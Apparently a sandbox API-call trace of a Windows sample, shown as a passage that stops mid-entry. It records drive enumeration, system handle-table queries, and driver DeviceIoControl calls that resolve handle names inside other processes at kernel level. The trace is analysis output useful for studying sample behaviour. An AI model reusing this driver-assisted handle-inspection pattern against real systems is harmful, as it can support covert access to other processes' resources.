GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0238.744] GetLastError () returned 0x0 [0238.744] SetLastError (dwErrCode=0x0) [0238.744] GetLastError () returned 0x0 [0238.744] SetLastError (dwErrCode=0x0) [0238.744] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\DosDevices\\C:" | out: DestinationString="\\DosDevices\\C:") [0238.744] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0xc0) returned 0x0 [0238.744] NtQuerySymbolicLinkObject (in: SymLinkObjHandle=0xc0, LinkTarget=0x12dbe0, DataWritten=0x12db08 | out: LinkTarget="\\Device\\HarddiskVolume1", DataWritten=0x12db08) returned 0x0 [0238.744] CloseHandle (hObject=0xc0) returned 1 [0238.744] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\Device\\HarddiskVolume1" | out: DestinationString="\\Device\\HarddiskVolume1") [0238.744] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0x0) returned 0xc0000024 [0238.745] GetLastError () returned 0x0 [0238.745] SetLastError (dwErrCode=0x0) [0238.745] GetLastError () returned 0x0 [0238.745] SetLastError (dwErrCode=0x0) [0238.745] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0238.745] GetLastError () returned 0x0 [0238.746] SetLastError (dwErrCode=0x0) [0238.746] GetLastError () returned 0x0 [0238.746] SetLastError (dwErrCode=0x0) [0238.746] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0238.746] GetLastError () returned 0x0 [0238.746] SetLastError (dwErrCode=0x0) [0238.746] GetLastError () returned 0x0 [0238.746] SetLastError (dwErrCode=0x0) [0238.746] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0238.746] GetLastError () returned 0x0 [0238.746] SetLastError (dwErrCode=0x0) [0238.746] GetLastError () returned 0x0 [0238.746] SetLastError (dwErrCode=0x0) [0238.746] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0238.746] GetLastError () returned 0x0 [0238.747] SetLastError (dwErrCode=0x0) [0238.747] GetLastError () returned 0x0 [0238.747] SetLastError (dwErrCode=0x0) [0238.747] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0238.747] GetLastError () returned 0x0 [0238.747] SetLastError (dwErrCode=0x0) [0238.747] GetLastError () returned 0x0 [0238.747] SetLastError (dwErrCode=0x0) [0238.747] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0238.747] GetLastError () returned 0x0 [0238.747] SetLastError (dwErrCode=0x0) [0238.747] GetLastError () returned 0x0 [0238.747] SetLastError (dwErrCode=0x0) [0238.747] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0238.747] GetLastError () returned 0x0 [0238.748] SetLastError (dwErrCode=0x0) [0238.748] GetLastError () returned 0x0 [0238.748] SetLastError (dwErrCode=0x0) [0238.748] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0238.748] GetLastError () returned 0x0 [0238.748] SetLastError (dwErrCode=0x0) [0238.748] GetLastError () returned 0x0 [0238.748] SetLastError (dwErrCode=0x0) [0238.748] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0238.748] GetLastError () returned 0x0 [0238.748] SetLastError (dwErrCode=0x0) [0238.748] GetLastError () returned 0x0 [0238.748] SetLastError (dwErrCode=0x0) [0238.748] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0238.748] GetLastError () returned 0x0 [0238.749] SetLastError (dwErrCode=0x0) [0238.749] GetLastError () returned 0x0 [0238.749] SetLastError (dwErrCode=0x0) [0238.749] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0238.749] GetLastError () returned 0x0 [0238.749] SetLastError (dwErrCode=0x0) [0238.749] GetLastError () returned 0x0 [0238.749] SetLastError (dwErrCode=0x0) [0238.749] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0238.749] GetLastError () returned 0x0 [0238.749] SetLastError (dwErrCode=0x0) [0238.749] GetLastError () returned 0x0 [0238.749] SetLastError (dwErrCode=0x0) [0238.749] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0238.749] GetLastError () returned 0x0 [0238.750] SetLastError (dwErrCode=0x0) [0238.750] GetLastError () returned 0x0 [0238.750] SetLastError (dwErrCode=0x0) [0238.750] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0238.750] GetLastError () returned 0x0 [0238.750] SetLastError (dwErrCode=0x0) [0238.750] GetLastError () returned 0x0 [0238.750] SetLastError (dwErrCode=0x0) [0238.750] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0238.750] GetLastError () returned 0x0 [0238.750] SetLastError (dwErrCode=0x0) [0238.750] GetLastError () returned 0x0 [0238.750] SetLastError (dwErrCode=0x0) [0238.750] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0238.751] GetLastError () returned 0x0 [0238.751] SetLastError (dwErrCode=0x0) [0238.751] GetLastError () returned 0x0 [0238.751] SetLastError (dwErrCode=0x0) [0238.751] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0238.751] GetLastError () returned 0x0 [0238.751] SetLastError (dwErrCode=0x0) [0238.751] GetLastError () returned 0x0 [0238.751] SetLastError (dwErrCode=0x0) [0238.751] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0238.751] GetLastError () returned 0x0 [0238.751] SetLastError (dwErrCode=0x0) [0238.751] GetLastError () returned 0x0 [0238.751] SetLastError (dwErrCode=0x0) [0238.751] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0238.752] GetLastError () returned 0x0 [0238.752] SetLastError (dwErrCode=0x0) [0238.752] GetLastError () returned 0x0 [0238.752] SetLastError (dwErrCode=0x0) [0238.752] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0238.752] GetLastError () returned 0x0 [0238.752] SetLastError (dwErrCode=0x0) [0238.752] GetLastError () returned 0x0 [0238.752] SetLastError (dwErrCode=0x0) [0238.752] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0238.752] GetLastError () returned 0x0 [0238.752] SetLastError (dwErrCode=0x0) [0238.752] GetLastError () returned 0x0 [0238.752] SetLastError (dwErrCode=0x0) [0238.752] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0238.753] GetLastError () returned 0x0 [0238.753] SetLastError (dwErrCode=0x0) [0238.753] GetLastError () returned 0x0 [0238.753] SetLastError (dwErrCode=0x0) [0238.753] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0238.753] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x4000) returned 0x1d8b10 [0238.753] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1d8b10, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x6bd38) returned 0xc0000004 [0238.759] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0238.759] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x8000) returned 0x1d8b10 [0238.759] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1d8b10, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x6bd38) returned 0xc0000004 [0238.762] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0238.762] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x10000) returned 0x1d8b10 [0238.762] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1d8b10, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x6bd38) returned 0xc0000004 [0238.766] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0238.766] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x20000) returned 0x1d8b10 [0238.766] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1d8b10, Length=0x20000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x6b838) returned 0xc0000004 [0239.036] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0239.036] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x40000) returned 0x1d8b10 [0239.036] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1d8b10, Length=0x40000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x6b770) returned 0xc0000004 [0239.047] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0239.047] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x80000) returned 0x1e20080 [0239.048] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1e20080, Length=0x80000, ResultLength=0x12e420 | out: SystemInformation=0x1e20080, ResultLength=0x12e420*=0x6b770) returned 0x0 [0239.614] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x4000) returned 0x1d8b10 [0239.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1d8b10, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x13f98) returned 0xc0000004 [0239.614] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0239.614] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x8000) returned 0x1d8b10 [0239.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1d8b10, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x13f98) returned 0xc0000004 [0239.615] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0239.615] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0xc000) returned 0x1d8b10 [0239.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1d8b10, Length=0xc000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x13f98) returned 0xc0000004 [0239.615] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0239.615] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x10000) returned 0x1d8b10 [0239.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1d8b10, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x13f98) returned 0xc0000004 [0239.615] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d8b10 | out: hHeap=0x1b0000) returned 1 [0239.615] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x14000) returned 0x1d8b10 [0239.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1d8b10, Length=0x14000, ResultLength=0x12e420 | out: SystemInformation=0x1d8b10, ResultLength=0x12e420*=0x13f98) returned 0x0 [0239.617] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x6f4) returned 0xc0 [0239.617] GetCurrentProcess () returned 0xffffffffffffffff [0239.617] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x28, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.617] CloseHandle (hObject=0xc0) returned 1 [0239.617] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.617] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x80) returned 0x1d4c50 [0239.617] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.617] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.617] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.617] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.617] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.617] PsAcquireProcessExitSynchronization () returned 0x0 [0239.617] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0) [0239.618] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002616070, HandleInformation=0x0) returned 0x0 [0239.618] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.618] PsReleaseProcessExitSynchronization () returned 0x2 [0239.618] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0x1a [0239.618] ObQueryNameString (in: Object=0xfffffa8002616070, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.618] ObfDereferenceObject (Object=0xfffffa8002616070) returned 0x4 [0239.618] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.618] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.618] CloseHandle (hObject=0xc4) returned 1 [0239.619] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x6f4) returned 0xc4 [0239.619] GetCurrentProcess () returned 0xffffffffffffffff [0239.619] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.619] CloseHandle (hObject=0xc4) returned 1 [0239.619] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.619] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.619] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.619] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.619] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.619] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.619] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.619] PsAcquireProcessExitSynchronization () returned 0x0 [0239.619] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0) [0239.619] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034c3ee0, HandleInformation=0x0) returned 0x0 [0239.619] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.619] PsReleaseProcessExitSynchronization () returned 0x2 [0239.620] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0x1a [0239.620] ObQueryNameString (in: Object=0xfffffa80034c3ee0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.620] ObfDereferenceObject (Object=0xfffffa80034c3ee0) returned 0x4 [0239.620] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.620] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.620] CloseHandle (hObject=0xc0) returned 1 [0239.620] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x6f4) returned 0xc0 [0239.620] GetCurrentProcess () returned 0xffffffffffffffff [0239.620] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.620] CloseHandle (hObject=0xc0) returned 1 [0239.620] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.620] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.620] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.620] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.620] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.620] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0239.620] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.620] PsAcquireProcessExitSynchronization () returned 0x0 [0239.620] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0) [0239.620] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80022cbdc0, HandleInformation=0x0) returned 0x0 [0239.620] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.621] PsReleaseProcessExitSynchronization () returned 0x2 [0239.621] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0x1a [0239.621] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.621] ObfDereferenceObject (Object=0xfffffa80022cbdc0) returned 0x2 [0239.621] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.621] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.621] CloseHandle (hObject=0xc4) returned 1 [0239.621] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x6f4) returned 0xc4 [0239.621] GetCurrentProcess () returned 0xffffffffffffffff [0239.621] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x18, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.621] CloseHandle (hObject=0xc4) returned 1 [0239.621] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.621] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x80) returned 0x1d4c50 [0239.621] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.621] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.621] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.621] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0239.621] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.621] PsAcquireProcessExitSynchronization () returned 0x0 [0239.621] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0) [0239.621] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000745eb0, HandleInformation=0x0) returned 0x0 [0239.621] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.622] PsReleaseProcessExitSynchronization () returned 0x2 [0239.622] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0x1a [0239.622] ObQueryNameString (in: Object=0xfffff8a000745eb0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.622] ObfDereferenceObject (Object=0xfffff8a000745eb0) returned 0xd3 [0239.622] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.622] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.622] CloseHandle (hObject=0xc0) returned 1 [0239.622] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x6f4) returned 0xc0 [0239.622] GetCurrentProcess () returned 0xffffffffffffffff [0239.622] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x14, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.622] CloseHandle (hObject=0xc0) returned 1 [0239.622] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.622] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x70) returned 0x1d4c50 [0239.622] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.622] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.622] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.622] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0xc0, lpOverlapped=0x0) returned 1 [0239.622] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.622] PsAcquireProcessExitSynchronization () returned 0x0 [0239.622] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880053c85d0) [0239.623] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00424cb30, HandleInformation=0x0) returned 0x0 [0239.623] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.623] PsReleaseProcessExitSynchronization () returned 0x2 [0239.623] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0x1a [0239.623] ObQueryNameString (in: Object=0xfffff8a00424cb30, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.623] ObfDereferenceObject (Object=0xfffff8a00424cb30) returned 0x2 [0239.623] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.623] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.623] CloseHandle (hObject=0xc4) returned 1 [0239.623] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x748) returned 0xc4 [0239.623] GetCurrentProcess () returned 0xffffffffffffffff [0239.623] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x90, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0239.623] CloseHandle (hObject=0xc4) returned 1 [0239.623] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x88) returned 0x1d4c50 [0239.623] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1d4c50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1d4c50*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0239.623] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c85a8 | out: Process=0xfffff880053c85a8) returned 0x0 [0239.623] PsAcquireProcessExitSynchronization () returned 0x0 [0239.623] KeStackAttachProcess (in: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85c8 | out: PROCESS=0xfffffa8002fcab30, ApcState=0xfffff880053c85c8) [0239.623] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c85b0, HandleInformation=0x0 | out: Object=0xfffff880053c85b0*=0xfffffa800317f870, HandleInformation=0x0) returned 0x0 [0239.623] PsReleaseProcessExitSynchronization () returned 0x2 [0239.623] ObfDereferenceObject (Object=0xfffffa8002fcab30) returned 